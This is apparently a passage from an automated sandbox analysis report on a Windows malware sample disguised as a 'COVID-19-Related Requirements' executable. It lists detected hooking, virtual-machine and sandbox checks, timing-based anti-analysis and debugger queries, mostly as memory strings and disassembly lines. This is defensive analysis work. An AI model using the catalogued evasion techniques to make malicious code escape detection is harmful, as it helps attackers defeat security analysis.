          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B265A3 push ds; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B26FEF push edi; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94983598919

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: COVID-19-Related Requirements.exe PID: 6852, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000B198E4 second address: 0000000000B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000B19B5E second address: 0000000000B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe TID: 6920Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000010.00000000.463020458.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000010.00000000.462913500.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 00000010.00000000.458024003.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000010.00000000.462913500.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000010.00000000.458024003.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000010.00000000.462041063.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000010.00000000.454333728.000000000461E000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000010.00000000.462041063.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000010.00000000.463020458.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B905AC mov eax, dword ptr fs:[00000030h]
